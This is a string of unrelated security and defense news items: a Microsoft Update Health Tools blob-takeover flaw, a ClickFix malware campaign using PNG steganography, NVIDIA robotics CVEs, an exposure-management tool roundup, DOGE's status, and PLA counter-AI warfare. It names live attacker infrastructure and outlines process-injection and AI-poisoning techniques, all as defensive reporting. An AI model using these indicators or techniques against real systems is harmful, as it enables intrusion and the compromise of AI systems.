A critical remote code execution (RCE) vulnerability in Microsoft’s Update Health Tools (KB4023057). A widely deployed Windows component designed to expedite security updates through Intune.
The flaw stems from the tool connecting to dropped Azure Blob storage accounts that attackers could register and control.
How the Vulnerability Works
The vulnerability exists in version 1.0 of the Update Health Tools, which uses Azure Blob storage accounts following a predictable naming pattern (payloadprod0 through payloadprod15.blob.core.windows.net) to fetch configuration files and commands.
Eye Security researchers found that Microsoft had left 10 of the 15 storage accounts unregistered and unused.
After registering these abandoned endpoints, the researchers observed over 544,000 HTTP requests within seven days from nearly 10,000 unique Azure tenants worldwide.
The tool’s uhssvc.exe service, located at C:\Program Files\Microsoft Update Health Tools, was actively resolving these domains across multiple enterprise environments.
uhssvc.exe file
The critical issue lies in the tool’s “ExecuteTool” action, which allows execution of Microsoft-signed binaries.
By crafting malicious JSON payloads that point to legitimate Windows executables such as explorer.exe, attackers can achieve arbitrary code execution on vulnerable systems.
The newer version 1.1 implements a proper web service at devicelistenerprod.microsoft.com, though backward-compatibility options could still expose systems.
Eye Security reported the vulnerability to Microsoft on July 7, 2025, and Microsoft confirmed the behavior on July 17.
Hashicorp researchers transferred ownership of all compromised storage accounts back to Microsoft on July 18, 2025, effectively closing the attack vector.
Organizations should ensure they are running the latest version of Update Health Tools and verify no legacy configurations remain enabled.
Security teams should monitor for unusual network traffic to Azure Blob storage endpoints from update services.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert warning that multiple cyber threat actors are actively exploiting commercial spyware to target users of popular mobile messaging applications, including Signal and WhatsApp. The advisory, published on November 24, 2025, highlights sophisticated attack techniques aimed at compromising victim accounts and gaining unauthorized access […]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans (RATs) to target users of mobile messaging applications.
“These cyber actors use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app,
Threat actors are weaponizing Blender Foundation project files to deliver the notorious StealC V2 infostealer, targeting 3D artists and game developers who download community assets from popular marketplaces. In recent months, Morphisec has blocked multiple sophisticated campaigns abusing Blender’s embedded scripting capabilities to silently deploy StealC V2, highlighting a growing nexus between creative tools and […]
Exposure Management is a proactive cybersecurity discipline that systematically identifies, assesses, prioritizes, and remediates security vulnerabilities and misconfigurations across an organization’s entire attack surface both internal and external.
Unlike traditional, periodic vulnerability scanning, EM leverages continuous monitoring, threat intelligence, and a holistic, graph-based view of risk to anticipate and neutralize potential attack paths before adversaries can exploit them.
It is the practical application of the Continuous Threat Exposure Management (CTEM) framework, which defines a cyclical five-step process: Scoping, Discovery, Prioritization, Validation, and Mobilization.
The core value of an EM platform lies in its ability to consolidate findings from diverse security tools (such as vulnerability scanners, cloud posture management, and EDR) and enrich them with business context (e.g., asset criticality, owner) and attacker context (e.g., exploitability in the wild).
This consolidation drastically reduces alert fatigue by focusing security teams on the few exposures that pose the greatest, most exploitable risk to the business, rather than a massive, unprioritized list of Common Vulnerabilities and Exposures (CVEs).
Ultimately, EM drives measurable reduction in the organizational risk posture and improves the efficiency of security operations.
How We Choose An Exposure Management Tools
Selecting the right Exposure Management Tool requires a strategic approach focused on holistic coverage, actionable intelligence, and seamless integration with existing Security Operations Center (SOC) workflows.
Our methodology for evaluating the top tools is based on several key criteria:
Scope and Discovery Coverage: The tool must offer comprehensive, continuous discovery of all assets including known, unknown (Shadow IT), and third-party/vendor-related assets—across the full spectrum of modern infrastructure (on-premise, multi-cloud, SaaS, and code). Look for agentless and API-based scanning capabilities for minimal friction.
Risk Prioritization & Context: The platform’s ability to prioritize vulnerabilities must go beyond simple severity scores (CVSS). The best tools use a risk-based approach incorporating:
Attacker Context: Real-time threat intelligence on active exploitation.
Business Context: Asset criticality, data sensitivity, and owner.
Attack Path Visualization: Mapping how an exposure can be chained with others to create an end-to-end attack path.
Validation and Remediation Integration: A top-tier tool validates whether an exposure is actually exploitable (often via integrated Breach and Attack Simulation – BAS) and provides clear, actionable remediation guidance, including one-click fixes or direct integration with ticketing/workflow systems (like Jira, ServiceNow) to accelerate Mean Time to Remediate (MTTR).
Scalability and Architecture: The solution must be highly scalable to accommodate a dynamic, rapidly expanding digital footprint, especially in cloud-native environments.
A cloud-native, agentless architecture often simplifies deployment and reduces operational overhead.
Comparison Table: Top 10 Best Exposure Management Tools In 2026
Mandiant is chosen for its world-class, frontline threat intelligence, which directly informs its risk prioritization engine.
This allows organizations to prioritize exposures that Mandiant’s consultants know adversaries are actively exploiting in real-world attacks.
Specifications & Features
Intel-Informed Checks: Uses Mandiant’s own threat intelligence for active and passive checks of external assets.
Continual Asset Discovery: Automated, continuous discovery and inventory of internet-facing assets, including Shadow IT.
Multicloud Assessment: Ability to assess cloud-hosted external assets and unify visibility across hybrid/multicloud.
Centralized Risk Mitigation: Consolidates visibility and provides clear paths for remediation, driven by threat context.
Reason to Buy
You need an exposure management tool that is directly fed by the industry’s most current, credible, and real-world attacker intelligence to ensure your security team focuses exclusively on the most exploitable risks.
Pros & Cons
Pros: Direct integration with Mandiant’s proprietary threat intel; Strong external focus and shadow IT detection; Effective for large, complex enterprises.
Cons: Less focus on integrated validation (BAS) than some competitors; Pricing can be complex; May require Mandiant-specific expertise for full value.
Best For: Enterprises prioritizing real-world threat intelligence and wanting an outside-in, attacker’s view of their external attack surface.
Wiz is the undisputed leader in Cloud Security Posture Management (CSPM) and has expanded to offer deep exposure management features rooted in its unique, agentless Security Graph.
It’s ideal for organizations that are cloud-first or heavily invested in multi-cloud environments.
Specifications & Features
Agentless-First Scanning: Provides 100% coverage of the cloud environment without agents, using API and snapshot reading.
Graph-Based Risk Prioritization: Correlates security findings across workloads, network, identity, and data to identify critical attack paths.
Unified Vulnerability Management: Centralizes and prioritizes vulnerabilities across cloud, code, and on-premises using the same context model.
Shift-Left Capabilities: Integrates with code (SAST/DAST) tools to find and fix vulnerabilities early in the development lifecycle.
Reason to Buy
Your primary risk is in the cloud, and you need a consolidated, context-aware platform that can identify exploitable security gaps that span across multiple cloud resources, identities, and data stores.
Pros & Cons
Pros: Deepest cloud security context and coverage; Exceptional ease of deployment (agentless); Industry-leading Security Graph technology; Excellent for modern DevOps pipelines.
Cons: Originally cloud-centric, with less native EASM/on-prem heritage; Can be expensive for smaller operations; Remediation often relies on integrations.
Best For: Cloud-Native and Multi-Cloud organizations that need to prioritize risk based on exploitability within the cloud environment.
RiskProfiler is selected for its focus on providing a unified view of risk that extends beyond the organization’s perimeter to include third-party vendor risk and brand risk (phishing, impersonation), making it a comprehensive CTEM solution.
Specifications & Features
Unified CTEM Ecosystem: Consolidates External, Cloud, Vendor, and Brand risk into a single platform.
Brand Risk Protection: Monitors for brand impersonation, typosquats, phishing, and fake apps.
AI-Enabled Third-Party Risk Management: Automates the exchange and scoring of vendor security questionnaires.
Context-Based Graph Models: Pinpoints and ranks exposed assets by evaluating risks through a hacker’s lens.
Reason to Buy
You need to manage your total external risk, including the exposure introduced by supply chain vendors and threats to your brand reputation outside of your technical infrastructure.
Pros & Cons
Pros: Strong integration of third-party risk management; Dedicated brand protection features; Contextual threat insights for prioritization; Unified view across four major risk domains.
Cons: Focus is heavily external, may require other tools for deep internal security; Smaller market presence compared to industry giants; Initial setup for all modules can be complex.
Best For: Organizations with significant third-party vendor reliance and high exposure to brand-related threats (phishing, impersonation).
CrowdStrike is included for its ability to integrate Exposure Management natively within the Falcon platform, leveraging its ubiquitous single, lightweight sensor for real-time asset discovery and vulnerability assessment across the internal and external attack surface.
Specifications & Features
Unified Falcon Sensor: Uses a single, lightweight agent for real-time, maintenance-free vulnerability assessment and continuous visibility.
AI-Powered Asset Criticality: Automatically classifies assets (Critical, High, Non-Critical) based on business context and peer insights.
Full Lifecycle Vulnerability Management: Covers asset discovery, assessment, prioritization, and effective remediation within a single product.
Active, Passive, & API Discovery: Discovers all assets, including sensorless devices (routers, IoT), without traditional network scanning appliances.
Reason to Buy
You are already a CrowdStrike customer and want to consolidate your endpoint security, threat intelligence, and exposure management into a single, high-performance platform with minimal footprint.
Pros & Cons
Pros: Real-time visibility without scan windows; Excellent threat intelligence integration; Reduces the need for multiple security agents; Seamlessly integrates with EDR/XDR workflows.
Cons: Heavily reliant on the Falcon sensor (not fully agentless); Primarily focuses on the asset visibility the sensor can provide; Higher cost for the full unified platform.
Best For: Organizations committed to the CrowdStrike Falcon platform who prioritize real-time, continuous visibility over periodic scanning.
Tenable is a long-standing leader in Vulnerability Management (VM) that has successfully pivoted to the holistic Exposure Management model with its Tenable One platform, offering deep, comprehensive coverage across IT, cloud, and operational technology (OT).
Specifications & Features
Converged Exposure Platform: Unifies data from Tenable’s VM, EASM, Cloud Security, and AD Security products.
Predictive Prioritization Scoring (PPS): Uses machine learning to anticipate which vulnerabilities are most likely to be exploited in the near future.
Unified Attack Surface Visualization: Provides a consolidated view of the entire attack surface and the paths an attacker could take.
Broadest Asset Coverage: Includes IT, Web Apps, OT, Cloud, and Active Directory security posture.
Reason to Buy
You require a solution from a trusted VM vendor that offers the broadest coverage of assets and the ability to leverage predictive analytics to prioritize remediation based on future exploit likelihood.
Pros & Cons
Pros: Deepest history and coverage in core vulnerability management; Strong support for diverse environments (OT/AD); Predictive risk scoring for proactive prioritization; High potential for upselling existing Tenable customers.
Cons: Can be perceived as scan-heavy (though API-based for cloud); Platform integration is newer than individual products; Transitioning from a VM mindset to an EM mindset can be a learning curve.
Best For: Large enterprises seeking to consolidate and modernize their legacy vulnerability and asset management programs under a single, unified exposure platform.
Qualys is a veteran in the security space that has tightly integrated its External Attack Surface Management (EASM) into its comprehensive Cloud Platform, providing a seamless “outside-in” and “inside-out” view for existing customers.
Specifications & Features
EASM as a Feature: Provides an outside-in view of internet-facing assets within the Qualys Cloud Platform (CSAM).
Continuous Monitoring: Continuously monitors the external attack surface to discover new domains, unsolicited ports, certificates, and applications.
Asset Discovery: Discovers all domains, subdomains, and associated assets, including unknown/unmanaged assets.
Integration with VMDR: Directly feeds EASM findings into the Vulnerability Management, Detection, and Response (VMDR) workflow for prioritization and remediation.
Reason to Buy
You are a current Qualys customer looking to extend the reach of your existing security platform to continuously discover and manage your external digital footprint and integrate findings with a familiar VMDR workflow.
Pros & Cons
Pros: Deep integration with the Qualys ecosystem; Comprehensive visibility of external assets; Robust for large organizations with complex IT infrastructure; Consolidates EASM under a single vendor.
Cons: EASM features can feel like an add-on to the VMDR core; Full feature set requires adoption of the full Qualys Cloud Platform; Initial EASM feature may have started as a beta.
Best For: Existing Qualys Cloud Platform users who want to centralize EASM and vulnerability data under a single vendor.
CyCognito stands out for its attacker-centric approach, which automatically discovers and tests all internet-exposed assets (both known and unknown) from the perspective of a malicious actor, prioritizing risks based on the probability and impact of exploitation.
Specifications & Features
Attacker-Centric Discovery: Discovers all internet-exposed assets to build a complete picture of the attack surface from the outside.
Automated Security Testing: Automatically detects and validates potential attack vectors across the external IT ecosystem.
Business Context Mapping: Graphs asset relationships and determines business context (owner, purpose, data sensitivity) for better prioritization.
Comprehensive Prioritization: Ranks attack vectors based on attacker priorities, business context, ease of exploitation, and remediation complexity.
Reason to Buy
You need an EM solution that goes beyond inventorying assets to actively and continuously testing them for exploitable flaws, helping you see and fix your exposure exactly as an attacker would.
Pros & Cons
Pros: Powerful, continuous security testing at scale; Strong focus on unknown/unmonitored assets; Prioritization based on attacker logic; Provides clear remediation guidance.
Cons: Not a traditional internal vulnerability scanner; Focus is heavily on the external/perimeter attack surface; Higher price point reflective of its advanced testing capabilities.
Best For: Organizations that prioritize continuous, active security testing and require an outside-in, attacker-focused view of their risk.
Microsoft is a strategic choice for its deep integration into the Microsoft Defender suite and its ability to provide a comprehensive view of external risks by leveraging Microsoft’s vast threat intelligence and cloud infrastructure presence.
Specifications & Features
Attack Surface Discovery: Maps the organization’s external attack surface by identifying all internet-facing assets, services, and applications.
Threat Intelligence Integration: Leverages up-to-date Microsoft threat intelligence feeds for proactive threat identification and response.
Automated Vulnerability Assessment: Automates the assessment of external defenses to find and address weaknesses.
Integration with Defender Ecosystem: Seamlessly works with other Microsoft Defender components (e.g., EDR, Cloud Security Posture Management) for unified security.
Reason to Buy
You are heavily invested in the Microsoft ecosystem (Azure, M365) and need a native, integrated EM solution that leverages your existing tools and Microsoft’s global threat intelligence network.
Pros & Cons
Pros: Unbeatable integration for Microsoft shops; Leverages Microsoft’s massive threat intelligence; Cost-friendly for existing Defender customers; Strong security monitoring and protection.
Cons: Initial setup and integration can be complicated for varied IT environments; Limited for non-Microsoft-centric cloud/infrastructure; Features may be more limited than best-of-breed EASM pure-plays.
Best For: Organizations that have standardized on the Microsoft Defender suite and utilize Microsoft Azure/Cloud services.
Cymulate is unique on this list because its core strength is Breach and Attack Simulation (BAS) and Exposure Validation, enabling organizations to continuously test their defenses against the latest adversarial techniques and validate that an exposure is truly a risk.
Specifications & Features
BAS/Exposure Validation Core: Continuously tests security controls across the full kill chain using automated, live, offensive testing.
AI-Assisted Custom Testing: Allows users to create realistic, multi-stage attack chains from plain language prompts or threat advisories (Purple Teaming).
Optimized Remediation: Provides actionable guidance, including control-ready threat updates and custom detection rules for SIEM/EDR platforms.
Cyber Resilience Metrics: Delivers a unified, measurable view of security posture, benchmarked against industry peers.
Reason to Buy
You need to move beyond simple vulnerability discovery to empirically validate if your security controls (firewalls, EDR, SIEM rules) are actually working against current threats and prioritize only those exposures that validation proves are exploitable.
Pros & Cons
Pros: Core focus on validation (BAS/CTEM step 4); Automated Purple Teaming capabilities; Provides quantitative, board-ready cyber resilience metrics; Excellent for optimizing and tuning existing security tools.
Cons: External Attack Surface Discovery is a supporting feature rather than the core focus; Requires strong integration with other discovery/scanner tools for full EM value; Requires expertise to leverage the full BAS potential.
Best For: Security teams that need to validate, optimize, and prove the effectiveness of their existing security controls against real-world threats (CTEM Validation).
Bitsight is known for its market-leading Security Ratings and brings that proprietary risk scoring and analytics model to its EASM platform, offering unmatched signal quality and contextual intelligence for external risks and third-party risk management.
Specifications & Features
Unmatched Signal Quality: Leverages behavioral analytics and telemetry from billions of daily events to identify true exposures with high precision.
Integrated Third-Party Risk: Extends EASM visibility and risk scoring to third-party vendors and supply chain partners.
Daily Discovery Cadence: Automated, daily discovery and classification of new or changed internet-facing assets.
Integration with GRC/SOC Workflows: Provides data for rapid response and allows for integration with workflow tools like Jira and ServiceNow.
Reason to Buy
Your primary driver is a quantifiable, data-driven security rating for both your own organization and your entire supply chain, driven by high-quality external risk data and analytics.
Pros & Cons
Pros: Industry-leading security ratings and risk quantification; Excellent for third-party risk management; Daily and automated asset discovery; Strong reporting and governance (GRC) focus.
Cons: Licensing model can be complex; Historically focused on ratings, the EASM platform is a newer extension; Less of an internal, post-exploitation focus than some other platforms.
Best For: Risk and Governance (GRC) teams that need quantitative security ratings and highly accurate, data-driven external exposure management for themselves and their vendors.
The evolution from reactive Vulnerability Management to proactive Exposure Management is the defining shift in cybersecurity for 2026.
The Top 10 Best Exposure Management Tools in 2026 reflect this trend, with leading vendors moving toward unified platforms that integrate discovery, threat intelligence, business context, and attack validation to deliver a prioritized, actionable view of risk.
When selecting a tool, organizations must align their choice with their primary risk domain whether it’s cloud-native risk (Wiz), the need for real-world threat intelligence (Mandiant), or the necessity of proving control effectiveness (Cymulate).
All platforms excel in risk prioritization, but the method (threat intelligence vs. attack path analysis vs. security ratings) is what sets them apart.
To begin building a comprehensive EM program, security teams should focus on the initial step of Continuous Threat Exposure Management (CTEM) by establishing a complete inventory of all internet-facing assets.
A new wave of ClickFix attacks is abusing highly realistic fake Windows Update screens and PNG image steganography to secretly deploy infostealing malware such as LummaC2 and Rhadamanthys on victim systems.
The campaigns rely on tricking users into manually running a pre-staged command, turning simple social engineering into a multi-stage, file-light infection chain that is hard for traditional defenses to spot.
ClickFix is a social engineering technique in which a web page convinces users to press Win+R, then paste and run a command that has been silently copied to the clipboard.
Earlier lures posed as “Human Verification” or robot-check pages, but newer activity observed by Huntress swaps this for a full-screen, blue Windows Update-style splash screen with convincing progress messages.
Once the fake update “completes,” the page instructs users to follow the familiar pattern and execute the malicious Run-box command.
That command typically launches mshta.exe with a URL whose second IP octet is hex-encoded, kicking off a staged chain that downloads obfuscated PowerShell and reflective .NET loaders. This approach leans heavily on trusted “living off the land” binaries, making the activity blend in with legitimate Windows behavior.
Malware hidden in PNG pixels
The most distinctive feature of this campaign is its use of a .NET steganographic loader that hides shellcode inside the pixel data of a PNG image.
Instead of appending data, the loader AES-decrypts an embedded PNG resource, reads the raw bitmap bytes, and reconstructs shellcode from a specific color channel, using a custom XOR-based routine to recover the payload in memory.
The recovered shellcode is Donut-packed and then injected into a target process such as explorer.exe via dynamically compiled C# code that calls standard Windows APIs like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.
In analyzed cases, this final stage has delivered LummaC2 and, in a separate Windows Update cluster, the Rhadamanthys information stealer.
Huntress has tracked ClickFix Windows Update clusters since early October, noting repeated use of the IP address 141.98.80[.]175 and rotating paths such as /tick.odd, /gpsc.dat, and /one.dat for the first mshta.exe stage.
Subsequent PowerShell stages have been hosted on domains like securitysettings[.]live and xoiiasdpsdoasdpojas[.]com, pointing back to the same backend infrastructure.
These campaigns continued to appear around the time of Operation Endgame 3.0, which targeted Rhadamanthys’ infrastructure in mid-November, disrupting servers and seizing domains linked to the stealer.
Even after the takedown announcement, researchers observed multiple active domains still serving the Windows Update ClickFix lure, though the Rhadamanthys payload itself appeared to be unavailable.
Because the attack hinges on user interaction with the Run dialog, one strong control is to disable the Windows Run box via Group Policy or registry settings (for example, configuring the NoRun policy under the Explorer key).
Security teams should also use EDR telemetry to watch for explorer.exe spawning mshta.exe, powershell.exe, or other scripting binaries with suspicious command lines.
User awareness remains critical: employees should be trained that neither CAPTCHA checks nor Windows Update processes will ever require pasting commands into the Run prompt from a web page.
During investigations, analysts can further validate potential ClickFix abuse by reviewing the RunMRU registry key, which records recent commands executed via the Run dialog.
TRUPPENÜBUNGSPLATZ PUTLOS TRAINING GROUND, Germany—In a grassy field near the Baltic Sea, U.S. soldiers used net-shooting hunter drones, specially outfitted 557 rifles, and .50-caliber machine guns to drop dozens of drones, large and small, into the cold mud.
For the U.S. Army, the daylong event marked the beginning of the end of firing $4-million missiles at $20,000 drones; for its European counterparts, it showed off options to counter Russia’s accelerating threat.
The event was part of Project Flytrap, a U.S. Army effort to advance the state of counter-drone art. More than 200 vendors applied to participate in the November iteration; 20 were chosen by the Global Tactical Edge Acquisition Directorate, a new procurement office the service set up to get such gear to the field quickly.
On Nov. 21, media and foreign militaries watched a series of demonstrations that showed off not just individual products, but how they could be made to work together in just days.
Brig. Gen. Curtis King of the 10th Army Air and Missile Defense Command told Defense One that Ukrainian descriptions of battlefield conditions have helped the U.S. Army develop new tactics, gear, and weapons.
Because supply lines are vulnerable, it’s useful to be able to make drones at, or near, the front lines. In a tent on the field, a soldier with the 10th AAMDC showed off the results of some experimentation: a 3D printer that can print a drone frame in a few hours. With pre-ordered electronic components, it could serve as an interceptor or as part of a sensor mesh to locate enemy drones and their launching points.
More sensing is key to effective, affordable counter-drone efforts. King said one of the most important aspects of the event was integrating data from active radar systems with that of passive radar, a novel form that deduces a drone’s location from perturbations in FM radio signals. And he said the event showed off a real breakthrough: integrating all that sensor data so it could be used at all levels, from anti-drone snipers to the operators of first-person-view drones to unit commanders.
“We were able to send that to the units that were working on classified systems, and we were able to send that information to units who were working on sensitive but unclassified information. We've been demonstrating that for a while, but what was so significant this time is the number of sensors that we did and we did that with no latency, meaning we got real-time data,” he said.
Soldier feedback led to a top prize for Armaments Research Company, whose portable drone-tracing gear could turn “every soldier into a sensor,” said CEO Mike Canty, an Iraq War veteran.
An “aim assistant” from Zeromark helps soldiers shoot down drones with bullets—rather than with lasers that are still under development or jammers that don’t work against autonomous drones.
Then there’s Fortem's net-shooting drone, useful in cities or around civilian populations.
Besides helping the U.S. Army, the show aimed to help European officials learn to defend themselves against Russian drones, even if the U.S. backs out of its security guarantees.
“What you saw today … are effectors that cost much less, sometimes a tenth of the cost of that drone. So not only are we still achieving the lethality we need, but we're doing it on the right side of the cost curve,” King told reporters.
Journalists from Europe wanted to know: will the tech on display really stop Russian drone incursions?
King and other Army officials didn’t have a simple answer. They noted that the United States remains part of NATO, that the event aimed to inform European decision-making, and that future FlyTrap events will incorporate ground robotics and air-launched effects.
Col. Chris Hill, project manager for integrated fires mission command, noted, “The real goal is to have soldiers from other countries that are part of the assessment, because you want skin in the game early. You want your soldiers to take a look at their own commands, to say, ‘Yes, this capability works.’ You see a lot of non-U.S. flags out there because if you look at the eastern flank, those are NATO countries. So every country along that plane who's in closest proximity to the threat from Russia needs to know that the kit actually works.”
NVIDIA has disclosed two critical code injection vulnerabilities affecting its Isaac-GR00T robotics platform.
The vulnerabilities, tracked as CVE-2025-33183 and CVE-2025-33184, exist within Python components and could allow authenticated attackers to execute arbitrary code, escalate privileges, and alter system data.
The flaws pose a significant threat to organizations deploying NVIDIA’s robotics solutions across industrial automation, research facilities, and autonomous systems.
Both vulnerabilities carry a high CVSS score of 7.8, indicating serious security risks that require immediate remediation.
Vulnerability Details
The code injection issues affect all versions of NVIDIA Isaac-GR00T N1.5 across all platforms.
An attacker with local access and low-level privileges could exploit these vulnerabilities without user interaction, potentially gaining complete system control.
CVE ID
Description
CVSS Score
CWE
Attack Vector
CVE-2025-33183
Code injection in Python component allowing arbitrary code execution
7.8
CWE-94
Local/Low Privilege
CVE-2025-33184
Code injection in Python component allowing arbitrary code execution
7.8
CWE-94
Local/Low Privilege
Successful exploitation could result in unauthorized code execution, privilege escalation, information disclosure, and data modification, compromising the integrity of critical robotic operations.
Both vulnerabilities stem from improper handling of user-supplied input in Python components, classified under CWE-94 (Improper Control of Generation of Code).
This weakness has been historically exploited in numerous attacks targeting interpreted code environments.
NVIDIA has released a software update addressing both vulnerabilities. The patch is available through GitHub commit 7f53666 of the Isaac-GR00T repository.
Organizations running Isaac-GR00T should immediately update to any code branch incorporating this specific commit to eliminate the attack surface.
System administrators should prioritize deploying the security update across all Isaac-GR00T deployments.
Given the high severity rating and the potential for critical system compromise, NVIDIA recommends treating this as an urgent priority.
Organizations unable to patch immediately should restrict local access to affected systems and monitor for suspicious activity.
NVIDIA’s Product Security Incident Response Team (PSIRT) continues monitoring for exploitation attempts.
The vulnerabilities were responsibly disclosed by Peter Girnus of Trend Micro Zero Day Initiative, highlighting the importance of coordinated vulnerability research.
For comprehensive information, visit NVIDIA’s Product Security page to access complete Security alerts and subscribe to future vulnerability notifications.
The Department of Government Efficiency, a cornerstone of the second Trump administration's efforts to remake the federal government, no longer exists as a "centralized entity," according to the head of the government’s personnel agency.
But the longstanding White House technology team that President Donald Trump used to house DOGE continues to work on technology modernization projects throughout federal agencies.
The administration’s head of the Office of Personnel Management, Scott Kupor, told Reuters that DOGE “doesn’t exist” anymore, and posted on X that DOGE doesn’t have “centralized leadership” within the U.S. DOGE Service, though he did clarify that its principles “remain alive and well.” Fox News also reported that the centralized office for DOGE is closed.
Trump used an existing, Obama-era technology unit in the White House to establish the controversial cost-cutting unit on day one of his administration in January, installing DOGE within what was then the U.S. Digital Service and renaming it the U.S. DOGE Service.
The Trump executive order establishing DOGE also set up a "temporary organization” within USDS with a pre-set dissolution date on July 4, 2026.
[[Related Posts]]
DOGE made headlines throughout the spring for shutting down entire agencies, culling government contracts, getting rid of federal employees and accessing sensitive government systems.
But as Nextgov/FCWhas reported before, the temporary organization and the USDS team that predated DOGE haven’t necessarily been working together, with the former taking on the controversial efficiency work and the other focusing on low-profile government modernization projects.
USDS still has about 50 employees, according to a source familiar with its operations who was not authorized to speak on the record. In July, the service was looking for new hires.
A shutdown plan for the White House, updated in October, also referenced 45 DOGE employees, which likely also refers to those working at USDS. The temporary DOGE organization had only one or two people left as of recent months, according to the source familiar.
The team that predated DOGE continues to work on user experience and modernization projects at agencies like the departments of Veterans Affairs and State, the General Services Administration and the Centers for Medicare and Medicaid Services. These efforts are in line with the work of the U.S. Digital Service pre-DOGE, said the source familiar.
The USDS accounts also posted that “the executive order establishing U.S. DOGE Service (USDS) is still in effect,” calling the Reuters story “misinformation” on X and LinkedIn Monday.
“USDS is still partnering with agencies to modernize federal technology and software to maximize governmental efficiency and productivity,” the post continued, the words written out over a photo of the popular internet doge meme associated with Dogecoin cryptocurrency and the administration’s efficiency team. The White House also told Nextgov/FCW that DOGE continues to be integrated into agencies.
“President Trump was given a clear mandate to reduce waste, fraud, and abuse across the federal government, and he continues to actively deliver on that commitment,” White House Assistant Press Secretary Liz Huston said in a statement.
Despite Kupor’s comments about a lack of centralized leadership for DOGE, the team’s acting administrator, Amy Gleason, does appear to still be at USDS.
It is true that much has changed about DOGE since the spring.
Billionaire Elon Musk initially led DOGE, but he stepped away from the effort in May only to have a public feud with Trump. Many DOGE staffers followed the Tesla CEO out the door, while others have taken on appointments and leadership roles in agencies.
One DOGE associate, Joe Gebbia, is now heading an entirely new White House “America by Design” initiative.
The news about DOGE becoming more dispersed isn’t necessarily a surprise.
In early June, the director of the Office of Management and Budget, Russell Vought, told lawmakers that the vision for DOGE was for it to become more "institutionalized" within agencies as “in-house consultants,” and that the leadership of DOGE was “decentralized” and with agency heads.
Either way, the DOGE ethos appears to still be a priority for the administration, which began layoff proceedings for 4,000 federal employees during the recent shutdown, a move a court eventually paused and Congress later reversed as part of the funding provision to reopen the government.
OPM and the Office of Management and Budget are institutionalizing the cost-cutting unit’s “principles,” the head of OPM wrote on X, linking to a blog about a recent executive order that set out new requirements for agencies on headcount and hiring.
OPM has “not taken on new responsibilities,” an OPM spokesperson told Nextgov/FCW, but continues “to prioritize efficiency in the federal workforce in line with the president’s priorities.”
A mask of darkness had fallen over the Gobi Desert training grounds at Zhurihe when the Blue Force unleashed a withering strike intended to wipe Red Force artillery off the map. Plumes rose from “destroyed” batteries as the seemingly successful fire plan took out its targets in waves. But it had all been a trap.
When Blue began to shift positions to avoid counter-battery fire, exercise control called a halt—and revealed that, far from defeating the enemy, more than half of Blue’s fire units had already been destroyed. After the exercise, the Red commander explained the ruse: he had salted the range with decoy guns and what he called “professional stand-ins,” the signatures of units and troops, which not only tricked Blue’s sensors and AI-assisted targeting into shooting at phantoms, but also revealed their own firing points.
It was just one example of how China’s military is building for a battlefield where humans and AI seek not just to fight, but fool each other.
Under the banner of “counter-AI warfare”, the People’s Liberation Army is teaching troops to fight the model as much as the soldier. Forces are learning to alter how vehicles appear to cameras, radar, and heat sensors so the AI misidentifies them, to feed junk or poisoned data into an opponent’s pipeline, and to swamp battlefield computers with noise. Leaders are drilling their own teams to spot when their own machines are wrong. The goal is simple: make an enemy’s military AI chase phantoms and miss the real threat.
The PLA conceives its counter-AI playbook as a triad that targets data, algorithms, and computing power. In May, PLA Daily described the concept in itsIntelligentized Warfare Panorama series. It argued that the most reliable way to “break intelligence” is to hit all three at once.
First, counter-data operations inject junk data, skew what the sensors see, slip in corrupted examples, and reshape a vehicle’s radar, heat, and visual signals with coatings and emitters that mimic another platform’s profile and even engine vibration to mislead AI-assisted ISR. Second, counter-algorithm operations take advantage of model weak spots with logic tricks and crafted inputs, confusing AIs by breaking their “reward” signals and leading them to waste time in fruitless searches. Finally, attacks on computing power include “hard-kill” kinetic and cyber strikes on data centers and links, and “soft-kill” saturation attacks that flood the battlespace with electromagnetic noise, tying down scarce computing resources and clogging decision loops. A 2024 study by PLA researchers lists soft-kill techniques such as data pollution, reversal, backdoor insertion, and adversarial attacks that manipulate machine learning models.
[[Related Posts]]
Commentary from PLA analysts casts the contest as algorithm-versus-algorithm in joint operations. It urges planners to defeat enemy algorithms by testing how the algorithms make decisions, scrambling the signals that guide drone swarms, and maneuvering in unexpected ways to throw off the patterns those systems are trained to favor, with the aim of tricking enemy sensors and models into misidentifying targets.
In sum, instead of fearing an enemy’s use of AI, the PLA defines the adversary’s AI as a target set, and assigns work to hit each part.
The PLA is already putting these ideas into action. In August 2023, an Air Force UAV regiment added “real and fake targets” to target-unmasking drills, forcing pilots to sort decoys from real targets. Similarly, PLA air-defense training now treats ultra-low-altitude penetration as a priority, with studies framing the fight as the meeting point of decoys, deceptive signatures, and AI-aided or intelligent recognition. In the maritime arena, a 2024 study builds a framework for unmanned underwater vehicles to detect and ignore acoustic decoys when attacking a surface vessel.
PLA writers also give sustained attention to the human half of the team. In April, PLA Daily warned that commanders can slide into technology dependency and amplify bias baked into training data. The remedy is training commanders to judge when to trust the AI and when to overrule it by adding deception scenarios to simulations and running human and machine war games so operators practice spotting bad advice and overriding it. Follow-on commentary argued for “cognitive consistency” between operator and tool. In this model, wargames embed adversary behavior and develop rapid courses of action so instructors can see when officers override a wrong algorithm and explain why.
Human-in-the-loop command remains the baseline, with humans continuing to play the role of operator, fail-safe, and moral arbiter. Lt. Gen. He Lei echoed this view in 2024, urging tight limits on wartime AI and insisting that life-and-death authority stay with humans. Recent guidance adds rules for how units collect, label, and track data from start to finish, and those rules feed training scenarios, post-exercise reviews, and performance scores.
Industry’s role
Reflecting this growth in PLA thinking, Chinese companies have also begun to market counter-AI products in the categories of physical deception, electronic warfare, and software. Huaqin Technology markets multispectral camouflage that hides radar, infrared, and visual signatures. Yangzhou Spark offers camouflage nets and suits, stealth coatings, radar-absorbing materials, smoke generators, signature simulators, and radar reflectors. JX Gauss advertises inflatable, full-scale radar-vehicle decoys with remote-controlled moving parts. Together, these products support the counter-data playbook by changing how vehicles appear to radar, infrared, and visual sensors, planting convincing decoys, and tricking AI-enabled surveillance into locking onto the wrong signals.
